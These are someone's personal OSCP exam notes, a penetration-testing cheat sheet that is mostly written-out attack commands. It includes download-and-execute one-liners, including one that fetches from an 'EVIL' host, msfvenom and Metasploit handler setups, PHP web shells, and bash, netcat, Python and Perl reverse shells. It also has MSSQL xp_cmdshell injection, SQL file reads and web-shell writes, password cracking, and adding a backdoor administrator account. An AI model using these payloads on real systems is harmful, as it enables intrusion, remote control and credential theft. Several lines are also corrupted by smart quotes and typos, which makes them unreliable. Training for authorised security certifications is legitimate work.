My Personal OSCP Notes
Welp, just my personal OSCP notes. I am pretty sure these can help you get VERY high score in your exam. So why not try them out?
I am still organizing all my scripts and stuff. Please stay tune to the repo.
PEASS - Privilege Escalation Awesome Scripts SUITE (with colors)
PowerSploit - Post-exploit framework - https://github.com/PowerShellMafia/PowerSploit
nishang - Post-exploit Toolkit - https://github.com/samratashok/nishang
Windows Privilege Escalation Fundamentals
Windows Privilege Escalation Methods for Pentesters
Ways to Download and Execute code via the Commandline
Windows Privilege Escalation - a cheatsheet
SQL Injection Techniques - https://www.exploit-db.com/docs/41273.pdf
Useful notes - https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/
OSCP Sample Report Offsec MSFVENOM Offsec Mimikatz Offsec Exam Guide PWK Forum Offensive Security’s Complete Guide to Alpha Hash Cracking
# Process list with user
tasklist /v
# Get all listening/connected port
netstat -a
# Get all local users
net users
# Launch powershell bypass policy
powershell -ep bypass
# Get all services (Recommend using PowerShell method instead)
sc query type= service > C:\inetpub\wwwroot\ServicesList.txt
# Process list with detailed command line
ps -Afwww
# Get all listening/connected port
netstat -natlp
# Get all files with SUID bit
find / -perm /4000
Please have a look PowerSploit and Nishang, both give you powerful features to finish your enum on Windows # Import/Load library (either one) . .\powersploit.psd1 Import-Module .\powersploit.psd1
# PowerShell One-liner
powershell -c <COMMAND>
# Download File (Windows XP/PowerShell 2.0+)
powershell "(new-object System.Net.WebClient).DownloadFile('http://10.11.0.51:4949/yo.exe','yo.exe')"
# Download File and execute (PowerShell 3.0+)
# iex = Invoke-Expression (Execution)
# iwr = Invoke-WebRequest (Download)
iex (iwr 'http://EVIL/evil.ps1')
# Jump x86 PowerShell to X64 PowerShell [Out-Of-OSCP-Scope]
C:\Windows\sysnative\windowspowershell\v1.0\powershell.exe -NonInteractive -NoProfile
# Get all services and write into file
Get-WmiObject win32_service | select Name, DisplayName, State, PathName |export-csv C:/inetpub/wwwroot/checks.txt
# Scanning TCP ports 1 - 65535 + verbose + OS detection + timeout settings + treat all host online
nmap -vv -p- -A -T4 -sV -Pn <IP>
# Find useful NMap Script Engine (NSE) Script [Change $1 to your keyword or save it as script]
ls -la /usr/share/nmap/scripts/ |grep $1 |awk -F ' ' '{print $NF}'
# Shell listener for reverse payload (Server side)
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.45.31
set LPORT 1337
set ExitOnSession false
exploit -j -z
# PHP Meterpreter reverse payload
msfvenom -p php/meterpreter/bind_tcp LHOST=10.11.0.51 LPORT=1337 -f php > meterp.php
# Find useful payload for msfvenom/metasploit (save it as script)
#!/bin/bash
cmd="msfvenom -l payloads "
for i in "$@"
do
cmd=$(echo $cmd && echo "|grep $i ")
done
eval $cmd
# Getting list of available format
msfvenom -l format
# General guide of msfvenom
msfvenom -f <FORMAT> -p <PAYLOAD> -e <ENCODE_METHOD> -b <BAD_CHAR> -o <OUTPUT_FILE> -a <ARCHITECTURE> [LHOST=<REVERSE_HOST> LPORT=<REVERSE_PORT>]
# PHP error display (useful for testing shells)
ini_set('display_errors', 1);
ini_set('display_startup_errors', 1);
error_reporting(E_ALL);
# PHP Simple Shell
<?php echo system($_GET['cmd']);?>
<?php @system($_GET['c'])?>
# bash reverse shell
bash -i >& /dev/tcp/10.11.0.51/1337 0>&1
# netcat (nc) reverse shell (simple)
/bin/sh | nc <your IP> <port>
# netcat (nc) evil reverse shell (require specific evil version)
nc -e /bin/bash <your IP> <port>
# Python reverse shell
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“192.168.38.31”,1339));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
# Perl reverse shell
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"10.11.1.246:1337");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
# Python shell construction (useful for TOO simple shell)
python -c 'import pty;pty.spawn("/bin/bash")'
# MSSQL No DUMP shell
DECLARE @c varchar(3000);set @c=0x70696e6731302e31312e302e3531;EXEC master..xp_cmdshell @c--
# MSSQL DUMP shell
DECLARE @cVARCHAR(8000);SET @c=0x64697220433a5c;INSERT INTO sqlmapoutput(data) EXEC master…xp_cmdshell @c–
# Python
python -m SimpleHTTPServer 8080
# Load local file
LOAD DATA LOCAL INFILE “/etc/passwd” INTO TABLE yolo
# Clear and Load local file
TRUNCATE yolo;LOAD DATA LOCAL INFILE “/etc/phpmyadmin/apache.conf” INTO TABLE yolo;
# Basic into dumpfile
select “<?php echo system($_GET['cmd']);?>” INTO dumpfile ‘/var/www/html/yolo.php’
# Mount file system
mount -t cifs -o user=bob,sec=ntlm,dir_mode=0077 “//10.11.1.136/Bob Share” /mnt/cifs
# John The Ripper
unshadow 10.11.1.141_passwd 10.11.1.141_shadow >10.11.1.141_tocrack
john --word=/usr/share/wordlists/rockyou.txt 10.11.1.141_tocrack --fork=30
# Windows add new administrator account
net user yolo whysoserious /add
net localgroup Administrators yolo /add
# Find broken UID files
find / -user root -perm -4000 -exec ls -ldb {} ; > /tmp/uids
# GCC cross compile
gcc -m32 -Wl,–hash-style=both -o exploit exploit.c
# SSH Local Bind Tunnel (Bind 1337 on client (local))
ssh -L 127.0.0.1:1337:localhost:443 root@victim
# SSH Remote Bind Tunnel (Bind 1337 on target (remote)) [Useful for tunneling into another network]
ssh -R 127.0.0.1:1337:10.30.0.3:443 root@victim
# SSH Dynamic Tunnel (Useful for VPN usage)
ssh -D9999 root@victim